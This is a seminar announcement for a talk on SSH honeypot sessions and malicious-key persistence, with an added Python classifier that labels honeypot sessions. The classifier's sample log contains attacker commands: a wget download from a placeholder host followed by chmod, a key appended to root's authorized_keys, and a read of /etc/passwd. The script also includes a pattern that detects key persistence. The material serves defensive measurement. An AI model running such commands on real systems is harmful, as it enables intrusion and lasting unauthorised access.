Yogesh Suriyanarayanan: Studying SSH Attacker Behavior via Honeypots and Active Key Scans
From Scouting to Staying: Studying SSH Attacker Behavior via Honeypots and Active Key Scans
- http://www.inet.haw-hamburg.de/events/inet-seminar/yogesh-suriyanarayanan-studying-ssh-attacker-behavior-via-honeypots-and-active-key-scans
- 2026-03-09T15:00:00+01:00
- 2026-03-09T16:00:00+01:00
Mar 09, 2026 from 03:00 PM to 04:00 PM (Europe/Berlin / UTC+01:00)
This talk connects two measurement perspectives on modern SSH attacks: what attackers do in honeypot sessions and what we can observe via active scans on real hosts over time.
Using ~163 million sessions in which attackers executed commands in the honeypots, the analysis shows that since early 2023 an increasing share of sessions is dominated by "scouting" commands rather than commands that modify the system state. Among the scouting cases, we also provide evidence of large-scale honeypot fingerprinting, for example through logins using the default credentials of known honeypots. Finally, the interaction traces repeatedly include attempts to establish SSH-key-based persistence. Overall, the honeypot-based longitudinal study shows a shift in SSH-based attacker behavior towards a more exploratory and persistent approach.
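The scouting versus state-modifying split and the SSH-key persistence signal described above, as an added illustration that is not part of the talk or its dataset: a small classifier over a constructed honeypot command transcript. The command sets and the log format are assumptions made for this example, not the study's own methodology.

```python
import re
from collections import defaultdict

# Constructed sample honeypot transcript (not from the study's dataset):
# one line per executed command, formatted "<session_id> <command line>".
SAMPLE_LOG = """\
s1 uname -a
s1 cat /proc/cpuinfo | grep name | wc -l
s1 ls -la /root/.ssh
s2 uname -a
s2 cd /tmp; wget http://example.invalid/payload; chmod +x payload
s2 echo "ssh-rsa AAAA...CONSTRUCTED" >> /root/.ssh/authorized_keys
s3 cat /etc/passwd
s3 free -m
"""

# Commands treated as changing system state (assumed list for illustration).
# Anything else (uname, cat, ls, free, ...) is treated as read-only "scouting".
STATE_CHANGING = {"wget", "curl", "chmod", "rm", "mv", "cp", "useradd",
                  "passwd", "crontab", "tee", "sed", "mkdir"}
# A write redirect (> or >>) into an authorized_keys file is the
# key-based persistence signal; merely reading the file is scouting.
KEY_PERSIST = re.compile(r">+\s*\S*authorized_keys")

def parse_sessions(log):
    """Group command lines by session id, preserving their order."""
    sessions = defaultdict(list)
    for line in log.splitlines():
        if line.strip():
            sid, _, cmd = line.partition(" ")
            sessions[sid].append(cmd)
    return sessions

def classify_session(commands):
    """Return (category, key_persistence_attempt) for one session."""
    modifies = persists = False
    for line in commands:
        if KEY_PERSIST.search(line):
            persists = True
        # Inspect every command inside pipelines and ';'/'&&'-chained lists.
        for part in re.split(r"[|;&]+", line):
            words = part.split()
            if words and words[0] in STATE_CHANGING:
                modifies = True
    # Writing a key changes state even when done with a redirect alone.
    category = "state-modifying" if (modifies or persists) else "scouting"
    return category, persists

def summarize(log):
    """Count sessions per category and sessions attempting key persistence."""
    counts = {"scouting": 0, "state-modifying": 0, "persistence": 0}
    for cmds in parse_sessions(log).values():
        category, persists = classify_session(cmds)
        counts[category] += 1
        counts["persistence"] += int(persists)
    return counts
```

Run `summarize(SAMPLE_LOG)` to get per-category session counts; the persistence counter is the figure a defender would trend over time alongside the scouting share.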
Motivated by this repeated appearance of SSH key persistence in the honeypot logs, this work leverages an active measurement dataset containing Nmap scans of hosts containing malicious SSH public keys. The dataset was collected over 8 months (Sep 2024–May 2025) covering 25,000+ compromised hosts and 53 malicious keys (MKs). Using the Nmap scans, we characterize the exposed services on compromised hosts, and by tracking MKs over time we observe patterns that suggest coordination or competition between actors. The understanding of attacker preferences gained from this work has been used to support proactive remediation efforts.
Together, these two perspectives link what attackers do during SSH sessions with what can be observed on Internet-facing hosts over time, giving a more complete view of SSH compromise and key-based persistence.
